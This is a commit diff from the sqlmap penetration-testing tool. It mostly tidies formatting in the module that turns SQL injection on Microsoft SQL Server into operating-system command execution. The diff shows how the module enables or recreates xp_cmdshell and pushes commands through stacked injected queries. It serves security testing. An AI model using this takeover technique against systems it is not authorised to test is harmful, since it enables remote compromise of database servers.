sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.

2025-12-06 12:41:30 +00:00 · 2010-01-02 02:02:12 +00:00
parent d55175a340
commit ce022a3b6e
62 changed files with 567 additions and 1026 deletions
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.convert import urlencode
@@ -34,7 +32,6 @@ from lib.core.exception import sqlmapUnsupportedFeatureException
 from lib.request import inject
 from lib.techniques.blind.timebased import timeUse

-
 class xp_cmdshell:
    """
    This class defines methods to deal with Microsoft SQL Server
@@ -44,9 +41,7 @@ class xp_cmdshell:
    def __init__(self):
        self.xpCmdshellStr = "master..xp_cmdshell"

-
    def __xpCmdshellCreate(self):
-        # TODO: double-check that this method works properly
        cmd = ""

        if kb.dbmsVersion[0] in ( "2005", "2008" ):
@@ -73,7 +68,6 @@ class xp_cmdshell:

        self.xpCmdshellExecCmd(cmd)

-
    def __xpCmdshellConfigure2005(self, mode):
        debugMsg  = "configuring xp_cmdshell using sp_configure "
        debugMsg += "stored procedure"
@@ -87,7 +81,6 @@ class xp_cmdshell:

        return cmd

-
    def __xpCmdshellConfigure2000(self, mode):
        debugMsg  = "configuring xp_cmdshell using sp_addextendedproc "
        debugMsg += "stored procedure"
@@ -96,12 +89,11 @@ class xp_cmdshell:
        if mode == 1:
            cmd  = "EXEC master..sp_addextendedproc 'xp_cmdshell', "
            cmd += "@dllname='xplog70.dll'"
-        else:
-            cmd = "EXEC master..sp_dropextendedproc xp_cmdshell"
+        else:
+            cmd = "EXEC master..sp_dropextendedproc xp_cmdshell"

        return cmd

-
    def __xpCmdshellConfigure(self, mode):
        if kb.dbmsVersion[0] in ( "2005", "2008" ):
            cmd = self.__xpCmdshellConfigure2005(mode)
@@ -110,7 +102,6 @@ class xp_cmdshell:

        self.xpCmdshellExecCmd(cmd)

-
    def __xpCmdshellCheck(self):
        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec + 2))
        duration = timeUse(query)
@@ -120,19 +111,16 @@ class xp_cmdshell:
        else:
            return False

-
    def xpCmdshellForgeCmd(self, cmd):
        return "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)

-
    def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):
-        if forgeCmd == True:
+        if forgeCmd:
            cmd = self.xpCmdshellForgeCmd(cmd)

        cmd = urlencode(cmd, convall=True)

-        inject.goStacked(cmd, silent)
-
+        inject.goStacked(cmd, silent)

    def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
        self.getRemoteTempPath()
@@ -146,8 +134,8 @@ class xp_cmdshell:

        self.delRemoteFile(tmpFile)

-        output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, sort=False, firstChar=first, lastChar=last)
-        inject.goStacked("DELETE FROM %s" % self.cmdTblName)
+        output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, sort=False, firstChar=first, lastChar=last)
+        inject.goStacked("DELETE FROM %s" % self.cmdTblName)

        if isinstance(output, (list, tuple)):
            output = output[0]
@@ -157,7 +145,6 @@ class xp_cmdshell:

        return output

-
    def xpCmdshellInit(self, mandatory=True):
        self.__xpCmdshellAvailable = False

@@ -167,7 +154,7 @@ class xp_cmdshell:

        result = self.__xpCmdshellCheck()

-        if result == True:
+        if result:
            logger.info("xp_cmdshell extended procedure is available")
            self.__xpCmdshellAvailable = True

@@ -180,7 +167,7 @@ class xp_cmdshell:
            if not choice or choice in ("y", "Y"):
                self.__xpCmdshellConfigure(1)

-                if self.__xpCmdshellCheck() == True:
+                if self.__xpCmdshellCheck():
                    logger.info("xp_cmdshell re-enabled successfully")
                    self.__xpCmdshellAvailable = True

@@ -191,7 +178,7 @@ class xp_cmdshell:
                    self.__xpCmdshellConfigure(0)
                    self.__xpCmdshellCreate()

-                    if self.__xpCmdshellCheck() == True:
+                    if self.__xpCmdshellCheck():
                        logger.info("xp_cmdshell created successfully")
                        self.__xpCmdshellAvailable = True

@@ -200,14 +187,14 @@ class xp_cmdshell:
                        warnMsg += "because sp_OACreate is disabled"
                        logger.warn(warnMsg)

-        if self.__xpCmdshellAvailable == False and mandatory == False:
+        if not self.__xpCmdshellAvailable and not mandatory:
            warnMsg  = "unable to get xp_cmdshell working, sqlmap will "
            warnMsg += "try to proceed without it"
            logger.warn(warnMsg)

            self.envInitialized = True

-        elif self.__xpCmdshellAvailable == False:
+        elif not self.__xpCmdshellAvailable:
            errMsg = "unable to proceed without xp_cmdshell"
            raise sqlmapUnsupportedFeatureException, errMsg

@@ -215,6 +202,6 @@ class xp_cmdshell:

        debugMsg  = "creating a support table to write commands standard "
        debugMsg += "output to"
-        logger.debug(debugMsg)
+        logger.debug(debugMsg)

        self.createSupportTbl(self.cmdTblName, self.tblField, "varchar(8000)")